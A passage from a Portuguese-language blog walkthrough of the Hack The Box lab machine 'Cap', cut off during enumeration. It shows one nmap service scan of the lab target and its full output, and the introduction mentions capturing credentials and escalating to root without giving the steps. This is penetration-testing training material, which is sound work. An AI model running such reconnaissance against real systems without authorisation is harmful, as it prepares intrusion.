<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.24.0 by Michael Rose
  Copyright 2013-2020 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->
<html lang="en" class="no-js">
  <head>
    <!-- start custom head snippets -->
<!-- Begin Jekyll GTM tag v1.0.3 -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-MF4PLJ5');</script>
<!-- End Jekyll GTM tag v1.0.3 -->


<!-- insert favicons. use https://realfavicongenerator.net/ -->
<link rel="shortcut icon" href="/assets/images/favicon.ico" />

<!-- Multilang tags -->

    
<link rel="alternate" hreflang="pt-BR" href="https://davicruz.com/walkthrough/2021/10/htb-cap">
<link rel="alternate" hreflang="x-default" href="https://davicruz.com/walkthrough/2021/10/htb-cap">
    

    
<link rel="alternate" hreflang="en-US" href="https://davicruz.com/en-US/walkthrough/2021/10/htb-cap">
        
<link rel="alternate" hreflang="en" href="https://davicruz.com/en-US/walkthrough/2021/10/htb-cap">
        
    


<!-- end custom head snippets -->

    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>Walktrough: HTB Cap | Davi Cruz</title>
<meta name="description" content="Olá pessoal!  A máquina desta semana será Cap, outra máquina Linux classificada como fácil do Hack The Box, criada por  InfoSecJack.">


  <meta name="author" content="Davi Cruz">
  
  <meta property="article:author" content="Davi Cruz">
  


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="Davi Cruz">
<meta property="og:title" content="Walktrough: HTB Cap">
<meta property="og:url" content="https://davicruz.com/walkthrough/2021/10/htb-cap">


  <meta property="og:description" content="Olá pessoal!  A máquina desta semana será Cap, outra máquina Linux classificada como fácil do Hack The Box, criada por  InfoSecJack.">



  <meta property="og:image" content="https://i.imgur.com/JkBtXmO.png">



  <meta name="twitter:site" content="@zerahzurc">
  <meta name="twitter:title" content="Walktrough: HTB Cap">
  <meta name="twitter:description" content="Olá pessoal!  A máquina desta semana será Cap, outra máquina Linux classificada como fácil do Hack The Box, criada por  InfoSecJack.">
  <meta name="twitter:url" content="https://davicruz.com/walkthrough/2021/10/htb-cap">

  
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:image" content="https://i.imgur.com/JkBtXmO.png">
  

  



  <meta property="article:published_time" content="2021-10-02T13:00:00-03:00">





  

  


<link rel="canonical" href="https://davicruz.com/walkthrough/2021/10/htb-cap">




<script type="application/ld+json">
  {
    "@context": "https://schema.org",
    
      "@type": "Person",
      "name": "Davi Cruz",
      "url": "https://davicruz.com/",
      "sameAs": ["https://twitter.com/zerahzurc","https://www.linkedin.com/in/davicruz","https://github.com/davi-cruz"]
    
  }
</script>


  <meta name="google-site-verification" content="hrWV-PqvbpxEy2HdpVYFQNws2Sz_tROleVyF18s2kWA" />


  <meta name="msvalidate.01" content="60B1FA6CDAF15D226AB529AF30386BD8">



  <meta name="yandex-verification" content="08de8d8c0326420f">



<!-- end _includes/seo.html -->



  <link href="/feed.xml" type="application/atom+xml" rel="alternate" title="Davi Cruz Feed">


<!-- https://t.co/dKP3o1e -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="preload" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css"></noscript>



  </head>

  <body class="layout--single wide">
    <!-- Begin Jekyll GTM tag v1.0.3 (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MF4PLJ5" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Jekyll GTM tag v1.0.3 (noscript) -->

    <nav class="skip-links">
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Pular para navegação primária</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Pular para conteúdo</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Pular para rodapé</a></li>
  </ul>
</nav>

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        <!-- CUSTOM: Edit to adjust links to localized page -->
        
        
          <a class="site-logo" href="/"><img src="/assets/images/logo.png" alt="Davi Cruz"></a>
        
        <a class="site-title" href="/">
          Davi Cruz
          
        </a>
        
        <!-- END CUSTOM: Edit to adjust links to localized page -->
        <ul class="visible-links">
          <!-- CUSTOM: Edit to get localized navigation --><li class="masthead__menu-item">
              <a href="/categorias/">Categorias</a>
            </li>
<li class="masthead__menu-item">
              <a href="/tags/">Tags</a>
            </li>
<li class="masthead__menu-item">
              <a href="/sobre/">Sobre</a>
            </li>
<!-- END CUSTOM: Edit to get localized navigation -->
        </ul>
        
        <button class="search__toggle" type="button">
          <span class="visually-hidden">Chavear busca</span>
          <i class="fas fa-search"></i>
        </button>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Chavear menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      





<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person" class="h-card">

  
    <div class="author__avatar">
      <a href="https://davicruz.com/">
        <img src="/assets/images/bio-photo.jpg" alt="Davi Cruz" itemprop="image" class="u-photo">
      </a>
    </div>
  

  <div class="author__content">
    <h3 class="author__name p-name" itemprop="name">
      <a class="u-url" rel="me" href="https://davicruz.com/" itemprop="url">Davi Cruz</a>
    </h3>
    
      <div class="author__bio p-note" itemprop="description">
        <p>Just another Cybersecurity professional</p>

      </div>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Siga</button>
    <ul class="author__urls social-icons">
      
        <li itemprop="homeLocation" itemscope itemtype="https://schema.org/Place">
          <i class="fas fa-fw fa-map-marker-alt" aria-hidden="true"></i> <span itemprop="name" class="p-locality">São Paulo, BR</span>
        </li>
      

      
        
          
            <li><a href="https://linkedin.com/in/davicruz" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fab fa-linkedin" aria-hidden="true"></i><span class="label">Linkedin</span></a></li>
          
        
          
            <li><a href="https://twitter.com/zerahzurc" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i><span class="label">Twitter</span></a></li>
          
        
          
            <li><a href="https://github.com/davi-cruz" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-github" aria-hidden="true"></i><span class="label">GitHub</span></a></li>
          
        
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      <!--
  <li>
    <a href="http://link-to-whatever-social-network.com/user/" itemprop="sameAs" rel="nofollow noopener noreferrer me">
      <i class="fas fa-fw" aria-hidden="true"></i> Custom Social Profile Link
    </a>
  </li>
-->
    </ul>
  </div>
</div>

  
  </div>



  <article class="page h-entry" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="Walktrough: HTB Cap">
    <meta itemprop="description" content="Olá pessoal!A máquina desta semana será Cap, outra máquina Linux classificada como fácil do Hack The Box, criada por  InfoSecJack.">
    <meta itemprop="datePublished" content="2021-10-02T13:00:00-03:00">
    

    <div class="page__inner-wrap">
      
        <header>
          <h1 id="page-title" class="page__title p-name" itemprop="headline">
            <a href="https://davicruz.com/walkthrough/2021/10/htb-cap" class="u-url" itemprop="url">Walktrough: HTB Cap
</a>
          </h1>
          

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-02T13:00:00-03:00">October 2, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          6 minuto(s) de leitura
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    
    
    <span class="page__meta-lang"><a href="/en-US/walkthrough/2021/10/htb-cap">Read also in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></span>
    

    

    

    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Compartilhar</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


        </header>
      

      <section class="page__content e-content" itemprop="text">
        
        <p>Olá pessoal!</p>

<p>A máquina desta semana será <strong>Cap</strong>, outra máquina Linux classificada como fácil do <a href="https://www.hackthebox.eu/">Hack The Box</a>, criada por  <a href="https://app.hackthebox.eu/users/52045">InfoSecJack</a>.<!--more--></p>

<p class="notice--info"><img class="emoji" title=":information_source:" alt=":information_source:" src="https://github.githubassets.com/images/icons/emoji/unicode/2139.png" height="20" width="20"> <strong>Info</strong>: Write-ups para máquinas do Hack The Box são postados assim que as máquinas são aposentadas.</p>

<p><img src="https://i.imgur.com/EP6oOn2.png" alt="HTB Cap" class="align-center"></p>

<p>Esta máquina foi bem fácil e demonstra o porque de garantir a comunicação segura enquanto acessamos os serviços dentro da organização, maneira utilizada para obter credenciais que, das quais, foi realizado o processo de escalação de privilégios para root.</p>

<h2 id="enumeração">Enumeração</h2>

<p>Como de costume, iniciado com um scan rápido do <code class="language-plaintext highlighter-rouge">nmap</code> para ver os serviços publicados nesta máquina.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-Pn</span> <span class="nt">-oA</span> quick 10.10.10.245
Host discovery disabled <span class="o">(</span><span class="nt">-Pn</span><span class="o">)</span><span class="nb">.</span> All addresses will be marked <span class="s1">'up'</span> and scan <span class="nb">times </span>will be slower.
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-08-10 20:04 <span class="nt">-03</span>
Nmap scan report <span class="k">for </span>10.10.10.245
Host is up <span class="o">(</span>0.073s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 <span class="o">(</span>RSA<span class="o">)</span>
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    gunicorn
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Tue, 10 Aug 2021 23:04:20 GMT
|     Connection: close
|     Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8
|     Content-Length: 232
|     &lt;<span class="o">!</span>DOCTYPE HTML PUBLIC <span class="s2">"-//W3C//DTD HTML 3.2 Final//EN"</span><span class="o">&gt;</span>
|     &lt;title&gt;404 Not Found&lt;/title&gt;
|     &lt;h1&gt;Not Found&lt;/h1&gt;
|     &lt;p&gt;The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.&lt;/p&gt;
|   GetRequest:
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Tue, 10 Aug 2021 23:04:15 GMT
|     Connection: close
|     Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8
|     Content-Length: 19386
|     &lt;<span class="o">!</span>DOCTYPE html&gt;
|     &lt;html <span class="nv">class</span><span class="o">=</span><span class="s2">"no-js"</span> <span class="nv">lang</span><span class="o">=</span><span class="s2">"en"</span><span class="o">&gt;</span>
|     &lt;<span class="nb">head</span><span class="o">&gt;</span>
|     &lt;<span class="nb">head</span><span class="o">&gt;</span>
|     &lt;meta <span class="nv">charset</span><span class="o">=</span><span class="s2">"utf-8"</span><span class="o">&gt;</span>
|     &lt;meta http-equiv<span class="o">=</span><span class="s2">"x-ua-compatible"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">"ie=edge"</span><span class="o">&gt;</span>
|     &lt;title&gt;Security Dashboard&lt;/title&gt;
|     &lt;meta <span class="nv">name</span><span class="o">=</span><span class="s2">"viewport"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">"width=device-width, initial-scale=1"</span><span class="o">&gt;</span>
|     &lt;<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"shortcut icon"</span> <span class="nb">type</span><span class="o">=</span><span class="s2">"image/png"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"/static/images/icon/favicon.ico"</span><span class="o">&gt;</span>
|     &lt;<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"/static/css/bootstrap.min.css"</span><span class="o">&gt;</span>
|     &lt;<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"/static/css/font-awesome.min.css"</span><span class="o">&gt;</span>
|     &lt;<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"/static/css/themify-icons.css"</span><span class="o">&gt;</span>
|     &lt;<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"/static/css/metisMenu.css"</span><span class="o">&gt;</span>
|     &lt;<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"/static/css/owl.carousel.min.css"</span><span class="o">&gt;</span>
|     &lt;<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"/static/css/slicknav.min.css"</span><span class="o">&gt;</span>
|     &lt;<span class="o">!</span><span class="nt">--</span> amchar
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Tue, 10 Aug 2021 23:04:15 GMT
|     Connection: close
|     Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8
|     Allow: GET, HEAD, OPTIONS
|     Content-Length: 0
|   RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     &lt;html&gt;
|     &lt;<span class="nb">head</span><span class="o">&gt;</span>
|     &lt;title&gt;Bad Request&lt;/title&gt;
|     &lt;/head&gt;
|     &lt;body&gt;
|     &lt;h1&gt;&lt;p&gt;Bad Request&lt;/p&gt;&lt;/h1&gt;
|     Invalid HTTP Version &amp;#x27<span class="p">;</span>Invalid HTTP Version: &amp;#x27<span class="p">;</span>RTSP/1.0&amp;#x27<span class="p">;</span>&amp;#x27<span class="p">;</span>
|     &lt;/body&gt;
|_    &lt;/html&gt;
|_http-server-header: gunicorn
|_http-title: Security Dashboard
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V<span class="o">=</span>7.91%I<span class="o">=</span>7%D<span class="o">=</span>8/10%Time<span class="o">=</span>611305F3%P<span class="o">=</span>x86_64-pc-linux-gnu%r<span class="o">(</span>GetR
SF:equest,2FE5,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">0</span><span class="se">\x</span><span class="s2">20200</span><span class="se">\x</span><span class="s2">20OK</span><span class="se">\r\n</span><span class="s2">Server:</span><span class="se">\x</span><span class="s2">20gunicorn</span><span class="se">\r\n</span><span class="s2">Date:</span><span class="se">\x</span><span class="s2">20
SF:Tue,</span><span class="se">\x</span><span class="s2">2010</span><span class="se">\x</span><span class="s2">20Aug</span><span class="se">\x</span><span class="s2">202021</span><span class="se">\x</span><span class="s2">2023:04:15</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\</span><span class="s2">
SF:nContent-Type:</span><span class="se">\x</span><span class="s2">20text/html;</span><span class="se">\x</span><span class="s2">20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Content-Length:</span><span class="se">\x</span><span class="s2">20193
SF:86</span><span class="se">\r\n\r\n</span><span class="s2">&lt;!DOCTYPE</span><span class="se">\x</span><span class="s2">20html&gt;</span><span class="se">\n</span><span class="s2">&lt;html</span><span class="se">\x</span><span class="s2">20class=</span><span class="se">\"</span><span class="s2">no-js</span><span class="se">\"\x</span><span class="s2">20lang=</span><span class="se">\"</span><span class="s2">en</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\</span><span class="s2">
SF:n</span><span class="se">\n</span><span class="s2">&lt;head&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;meta</span><span class="se">\x</span><span class="s2">20charset=</span><span class="se">\"</span><span class="s2">utf-8</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">2
SF:0&lt;meta</span><span class="se">\x</span><span class="s2">20http-equiv=</span><span class="se">\"</span><span class="s2">x-ua-compatible</span><span class="se">\"\x</span><span class="s2">20content=</span><span class="se">\"</span><span class="s2">ie=edge</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\</span><span class="s2">
SF:x20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;title&gt;Security</span><span class="se">\x</span><span class="s2">20Dashboard&lt;/title&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;meta</span><span class="se">\</span><span class="s2">
SF:x20name=</span><span class="se">\"</span><span class="s2">viewport</span><span class="se">\"\x</span><span class="s2">20content=</span><span class="se">\"</span><span class="s2">width=device-width,</span><span class="se">\x</span><span class="s2">20initial-scale=
SF:1</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">shortcut</span><span class="se">\x</span><span class="s2">20icon</span><span class="se">\"\x</span><span class="s2">20type=</span><span class="se">\"</span><span class="s2">image
SF:/png</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">/static/images/icon/favicon</span><span class="se">\.</span><span class="s2">ico</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;
SF:link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">/static/css/bootstrap</span><span class="se">\.</span><span class="s2">min</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">&gt;
SF:</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">/static/css/fon
SF:t-awesome</span><span class="se">\.</span><span class="s2">min</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20
SF:href=</span><span class="se">\"</span><span class="s2">/static/css/themify-icons</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;link</span><span class="se">\x</span><span class="s2">20rel=
SF:</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">/static/css/metisMenu</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">2
SF:0&lt;link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">/static/css/owl</span><span class="se">\.</span><span class="s2">carousel</span><span class="se">\.</span><span class="s2">min</span><span class="se">\.</span><span class="s2">
SF:css</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">/static/c
SF:ss/slicknav</span><span class="se">\.</span><span class="s2">min</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;!--</span><span class="se">\x</span><span class="s2">20amchar"</span><span class="o">)</span>%r<span class="o">(</span>HTTPOption
SF:s,B3,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">0</span><span class="se">\x</span><span class="s2">20200</span><span class="se">\x</span><span class="s2">20OK</span><span class="se">\r\n</span><span class="s2">Server:</span><span class="se">\x</span><span class="s2">20gunicorn</span><span class="se">\r\n</span><span class="s2">Date:</span><span class="se">\x</span><span class="s2">20Tue,</span><span class="se">\x</span><span class="s2">2
SF:010</span><span class="se">\x</span><span class="s2">20Aug</span><span class="se">\x</span><span class="s2">202021</span><span class="se">\x</span><span class="s2">2023:04:15</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n</span><span class="s2">Conten
SF:t-Type:</span><span class="se">\x</span><span class="s2">20text/html;</span><span class="se">\x</span><span class="s2">20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Allow:</span><span class="se">\x</span><span class="s2">20GET,</span><span class="se">\x</span><span class="s2">20HEAD,</span><span class="se">\x</span><span class="s2">20OP
SF:TIONS</span><span class="se">\r\n</span><span class="s2">Content-Length:</span><span class="se">\x</span><span class="s2">200</span><span class="se">\r\n\r\n</span><span class="s2">"</span><span class="o">)</span>%r<span class="o">(</span>RTSPRequest,121,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">2
SF:0400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n</span><span class="s2">Content-Type:</span><span class="se">\x</span><span class="s2">20text
SF:/html</span><span class="se">\r\n</span><span class="s2">Content-Length:</span><span class="se">\x</span><span class="s2">20196</span><span class="se">\r\n\r\n</span><span class="s2">&lt;html&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;head&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20
SF:</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;title&gt;Bad</span><span class="se">\x</span><span class="s2">20Request&lt;/title&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;/head&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;body&gt;</span><span class="se">\</span><span class="s2">
SF:n</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;h1&gt;&lt;p&gt;Bad</span><span class="se">\x</span><span class="s2">20Request&lt;/p&gt;&lt;/h1&gt;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20Invali
SF:d</span><span class="se">\x</span><span class="s2">20HTTP</span><span class="se">\x</span><span class="s2">20Version</span><span class="se">\x</span><span class="s2">20&amp;#x27;Invalid</span><span class="se">\x</span><span class="s2">20HTTP</span><span class="se">\x</span><span class="s2">20Version:</span><span class="se">\x</span><span class="s2">20&amp;#x27;RTSP
SF:/1</span><span class="se">\.</span><span class="s2">0&amp;#x27;&amp;#x27;</span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20&lt;/body&gt;</span><span class="se">\n</span><span class="s2">&lt;/html&gt;</span><span class="se">\n</span><span class="s2">"</span><span class="o">)</span>%r<span class="o">(</span>FourOhFourRequest,189
SF:,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">0</span><span class="se">\x</span><span class="s2">20404</span><span class="se">\x</span><span class="s2">20NOT</span><span class="se">\x</span><span class="s2">20FOUND</span><span class="se">\r\n</span><span class="s2">Server:</span><span class="se">\x</span><span class="s2">20gunicorn</span><span class="se">\r\n</span><span class="s2">Date:</span><span class="se">\x</span><span class="s2">20T
SF:ue,</span><span class="se">\x</span><span class="s2">2010</span><span class="se">\x</span><span class="s2">20Aug</span><span class="se">\x</span><span class="s2">202021</span><span class="se">\x</span><span class="s2">2023:04:20</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n</span><span class="s2">
SF:Content-Type:</span><span class="se">\x</span><span class="s2">20text/html;</span><span class="se">\x</span><span class="s2">20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Content-Length:</span><span class="se">\x</span><span class="s2">20232</span><span class="se">\</span><span class="s2">
SF:r</span><span class="se">\n\r\n</span><span class="s2">&lt;!DOCTYPE</span><span class="se">\x</span><span class="s2">20HTML</span><span class="se">\x</span><span class="s2">20PUBLIC</span><span class="se">\x</span><span class="s2">20</span><span class="se">\"</span><span class="s2">-//W3C//DTD</span><span class="se">\x</span><span class="s2">20HTML</span><span class="se">\x</span><span class="s2">203</span><span class="se">\.</span><span class="s2">2</span><span class="se">\x</span><span class="s2">20
SF:Final//EN</span><span class="se">\"</span><span class="s2">&gt;</span><span class="se">\n</span><span class="s2">&lt;title&gt;404</span><span class="se">\x</span><span class="s2">20Not</span><span class="se">\x</span><span class="s2">20Found&lt;/title&gt;</span><span class="se">\n</span><span class="s2">&lt;h1&gt;Not</span><span class="se">\x</span><span class="s2">20Found&lt;/h1&gt;
SF:</span><span class="se">\n</span><span class="s2">&lt;p&gt;The</span><span class="se">\x</span><span class="s2">20requested</span><span class="se">\x</span><span class="s2">20URL</span><span class="se">\x</span><span class="s2">20was</span><span class="se">\x</span><span class="s2">20not</span><span class="se">\x</span><span class="s2">20found</span><span class="se">\x</span><span class="s2">20on</span><span class="se">\x</span><span class="s2">20the</span><span class="se">\x</span><span class="s2">20ser
SF:ver</span><span class="se">\.\x</span><span class="s2">20If</span><span class="se">\x</span><span class="s2">20you</span><span class="se">\x</span><span class="s2">20entered</span><span class="se">\x</span><span class="s2">20the</span><span class="se">\x</span><span class="s2">20URL</span><span class="se">\x</span><span class="s2">20manually</span><span class="se">\x</span><span class="s2">20please</span><span class="se">\x</span><span class="s2">20ch
SF:eck</span><span class="se">\x</span><span class="s2">20your</span><span class="se">\x</span><span class="s2">20spelling</span><span class="se">\x</span><span class="s2">20and</span><span class="se">\x</span><span class="s2">20try</span><span class="se">\x</span><span class="s2">20again</span><span class="se">\.</span><span class="s2">&lt;/p&gt;</span><span class="se">\n</span><span class="s2">"</span><span class="o">)</span><span class="p">;</span>
